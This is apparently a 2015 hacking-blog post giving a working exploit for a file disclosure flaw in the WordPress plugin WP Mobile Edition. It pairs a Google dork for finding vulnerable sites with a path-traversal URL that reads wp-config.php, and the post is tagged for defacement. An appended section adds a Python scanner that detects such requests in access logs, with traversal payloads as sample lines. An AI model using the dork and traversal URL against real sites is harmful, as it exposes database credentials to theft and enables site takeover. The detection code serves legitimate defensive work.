LinuxSec Exploit

Nothing is Ever Locked

Exploit WordPress Plugin WP Mobile Edition Local File Disclosure Vulnerability

April 15, 2015 by Jack Wilder

Yup, this time I want to share another WordPress exploit, for a vulnerability in the WP Mobile Edition plugin.
The ‘WP Mobile Edition’ plugin does not filter the file parameter passed via GET (files in the request below) to /themes/mTheme-Unus/css/css.php. As a result, we can also view the source of the WordPress configuration located in wp-config.php.
OK, let's get straight to it.
Google Dorks :
inurl:?fdx_switcher=mobile
Exploit :
127.0.0.1/wp-content/themes/mTheme-Unus/css/css.php?files=../../../../wp-config.php

Tested on : BackBox Linux
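
Added example, not part of the original post or the plugin's code: a check that site owners can run over web-server access logs to spot requests like the one above, including percent-encoded variants. The log lines and the P helper are constructed, and the handling of comma-separated names in files is an assumption.

```python
import re
from posixpath import normpath
from urllib.parse import urlsplit, parse_qs, unquote

ENDPOINT = "/themes/mTheme-Unus/css/css.php"  # path from the post, matched as a suffix
REQUEST_RE = re.compile(r'"(?:GET|POST|HEAD) (\S+) HTTP/[\d.]+"')  # combined log format

def fully_decode(value, rounds=3):
    """Percent-decode repeatedly so single- and double-encoded ../ look the same."""
    for _ in range(rounds):
        decoded = unquote(value)
        if decoded == value:
            break
        value = decoded
    return value

def escapes_base(name):
    """True if a requested file name resolves outside the directory of css.php."""
    name = fully_decode(name).replace("\\", "/")
    if "\x00" in name or name.startswith("/"):
        return True
    resolved = normpath(name)
    return resolved == ".." or resolved.startswith("../")

def suspicious_requests(log_lines):
    """Return (line_number, decoded_value) for traversal attempts against css.php."""
    hits = []
    for number, line in enumerate(log_lines, start=1):
        match = REQUEST_RE.search(line)
        target = urlsplit(match.group(1)) if match else None
        if target is None or not fully_decode(target.path).endswith(ENDPOINT):
            continue
        for value in parse_qs(target.query, keep_blank_values=True).get("files", []):
            # Assumption: the script may take a comma-separated list, so check each name.
            for part in value.split(","):
                if escapes_base(part):
                    hits.append((number, fully_decode(part)))
    return hits

P = "/wp-content/themes/mTheme-Unus/css/css.php"  # constructed helper for the samples
SAMPLE_LOG = [  # constructed sample access-log lines, not real traffic
    f'203.0.113.5 - - [15/Apr/2015:10:00:01 +0000] "GET {P}?files=style.css HTTP/1.1" 200 512',
    f'203.0.113.9 - - [15/Apr/2015:10:00:07 +0000] "GET {P}?files=../../../../wp-config.php HTTP/1.1" 200 3120',
    f'203.0.113.9 - - [15/Apr/2015:10:00:09 +0000] "GET {P}?files=%252e%252e%252fwp-config.php HTTP/1.1" 200 3120',
    '203.0.113.7 - - [15/Apr/2015:10:01:00 +0000] "GET /index.php?files=../x HTTP/1.1" 200 100',
]

if __name__ == "__main__":
    print(suspicious_requests(SAMPLE_LOG))
```

A hit with a 200 status and a response size close to that of wp-config.php is a reason to rotate the database credentials and WordPress salts stored in that file.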

That's all for this tutorial, hope it's useful.


Filed Under: WordPress Exploit Tagged With: Bugs, Deface, Exploit, Security, Wordpress
